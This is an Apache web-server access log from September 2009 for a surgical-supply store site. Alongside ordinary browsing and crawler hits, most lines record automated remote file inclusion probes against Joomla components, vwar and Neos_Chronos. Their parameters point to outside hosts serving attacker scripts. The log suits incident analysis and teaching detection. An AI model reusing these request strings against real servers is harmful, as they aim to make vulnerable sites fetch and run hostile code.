58.6.5.184 - - [23/Sep/2009:06:09:39 -0400] "GET /images/items/7470915_THUMB.JPG HTTP/1.1" 200 2595 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0123754A1B28B70000E7053+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
77.222.40.206 - - [23/Sep/2009:06:09:41 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:06:09:41 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.6.5.184 - - [23/Sep/2009:06:10:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0123754A1B28B70000E7053+M37+ENG HTTP/1.1" 200 50594 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:10:20 -0400] "GET /images/items/7474003_THUMB.JPG HTTP/1.1" 200 2399 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0123754A1B28B70000E7053+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:10:20 -0400] "GET /images/items/7473003_THUMB.JPG HTTP/1.1" 200 2263 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0123754A1B28B70000E7053+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
211.203.180.144 - - [23/Sep/2009:06:10:26 -0400] "GET ///?path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:10:26 -0400] "GET /logs///?path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 18978 "-" "Mozilla/5.0"
58.6.5.184 - - [23/Sep/2009:06:10:39 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:10:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:10:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:10:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
211.203.180.144 - - [23/Sep/2009:06:11:45 -0400] "GET /logs/?custompluginfile[]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:11:46 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:11:49 -0400] "GET /?custompluginfile[]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:11:53 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:11:53 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:11:53 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:11:53 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:32 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:12:32 -0400] "GET /logs/access_log.Q109052800///?path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:12:36 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:12:53 -0400] "GET /logs/access_log.Q109071000///?path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:06:12:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [23/Sep/2009:06:12:57 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:12:57 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:12:57 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
82.132.139.6 - - [23/Sep/2009:06:13:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A400 Safari/528.16"
82.132.139.6 - - [23/Sep/2009:06:13:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A400 Safari/528.16"
81.19.69.149 - - [23/Sep/2009:06:13:08 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:08 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:13:09 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:11 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:11 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.30.142.250 - - [23/Sep/2009:06:13:12 -0400] "GET /logs/access_log.Q108032600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.19.69.149 - - [23/Sep/2009:06:13:15 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:13:16 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:39 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:39 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:39 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:40 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:40 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:40 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:43 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:13:43 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.181.7.87 - - [23/Sep/2009:06:14:02 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.203.180.144 - - [23/Sep/2009:06:14:08 -0400] "GET //index.php?DOCUMENT_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:14:08 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:14:52 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.70.240.188 - - [23/Sep/2009:06:15:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.203.180.144 - - [23/Sep/2009:06:16:16 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:16:16 -0400] "GET /logs///vwar/backup/errors.php?error=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.203.180.144 - - [23/Sep/2009:06:16:16 -0400] "GET ///vwar/backup/errors.php?error=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:16:17 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:16:17 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:16:33 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:16:33 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:16:52 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:16:52 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:16:55 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:16:55 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:17:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:17:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:17:10 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:17:10 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:23 -0400] "GET //Neos_Chronos/header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:23 -0400] "GET /logs/access_log.Q109090600%20%20//Neos_Chronos/header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:23 -0400] "GET /logs/access_log.Q109082600%20%20//Neos_Chronos/header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:23 -0400] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:49 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:49 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:49 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:17:54 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.66.94 - - [23/Sep/2009:06:18:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [23/Sep/2009:06:18:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.203.180.144 - - [23/Sep/2009:06:18:34 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:18:42 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:18:42 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:18:42 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:18:42 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.50.48.72 - - [23/Sep/2009:06:18:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.50.48.72 - - [23/Sep/2009:06:18:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.50.48.72 - - [23/Sep/2009:06:18:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.50.48.72 - - [23/Sep/2009:06:18:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.100.5.136 - - [23/Sep/2009:06:19:02 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:02 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:02 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:11 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:11 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:11 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:36 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:19:57 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:20:08 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:20:08 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:20:12 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:20:12 -0400] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:20:23 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:20:23 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:20:23 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:20:25 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
